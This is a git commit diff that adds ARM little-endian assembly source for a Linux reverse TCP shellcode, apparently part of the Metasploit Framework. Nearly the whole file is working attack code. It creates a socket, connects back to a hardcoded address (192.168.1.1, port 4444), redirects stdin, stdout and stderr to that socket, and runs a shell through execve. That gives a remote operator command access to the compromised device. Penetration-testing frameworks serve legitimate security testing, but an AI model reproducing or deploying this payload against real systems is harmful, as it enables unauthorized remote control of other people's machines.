add source for linux/armle/shell_reverse_tcp

2014-04-29 19:39:10 +02:00 · 2014-04-29 19:39:10 +02:00 · 8331de2265
parent fd7248b3c0
commit 8331de2265
1 changed files with 93 additions and 0 deletions
--- a/external/source/shellcode/linux/armle/single_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/single_sock_reverse.s
@ -0,0 +1,93 @@
+@@
+@
+@        Name: single_sock_reverse
+@   Qualities: -
+@     Authors: civ, Mark Schloesser
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux reverse TCP shellcode for ARM LE architecture.
+@
+@        This source is built from the payload module (instead of other way around...)
+@
+@        Assemble with: as single_sock_reverse.s -o single_sock_reverse.o
+@        Link with:     ld single_sock_reverse.o -o single_sock_reverse
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Reverse TCP
+@ meta-description=Connect back to the framework and run a second stage
+@ meta-authors=civ, Mark Schloesser
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=singles
+@ meta-connection-type=reverse
+@ meta-name=reverse_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+@ socket(2,1,6)
+       mov     r0, #2
+       mov     r1, #1
+       add     r2, r1, #5
+       mov     r7, #140
+       add     r7, r7, #141
+       svc     0
+
+@ connect(soc, socaddr, 0x10)
+       mov     r6, r0
+       add     r1, pc, #96
+       mov     r2, #16
+       mov     r7, #141
+       add     r7, r7, #142
+       svc     0
+
+@ dup2(soc,0) @stdin
+       mov     r0, r6
+       mov     r1, #0
+       mov     r7, #63
+       svc     0
+
+@ dup2(soc,1) @stdout
+       mov     r0, r6
+       mov     r1, #1
+       mov     r7, #63
+       svc     0
+
+@ dup2(soc,2) @stderr
+       mov     r0, r6
+       mov     r1, #2
+       mov     r7, #63
+       svc     0
+
+@ execve(SHELL, [SHELLARG], [NULL])
+       add     r0, pc, #36
+       eor     r4, r4, r4
+       push    {r4}
+       mov     r2, sp
+       add     r4, pc, #36
+       push    {r4}
+       mov     r1, sp
+       mov     r7, #11
+       svc     0
+
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002
+@ ip: 192.168.1.1
+.word   0x0101a8c0
+@.word   0x0100007f
+
+@ SHELL
+.word 0x00000000 @ the shell goes here!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+@ SHELLARG
+.word 0x00000000 @ the args!
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000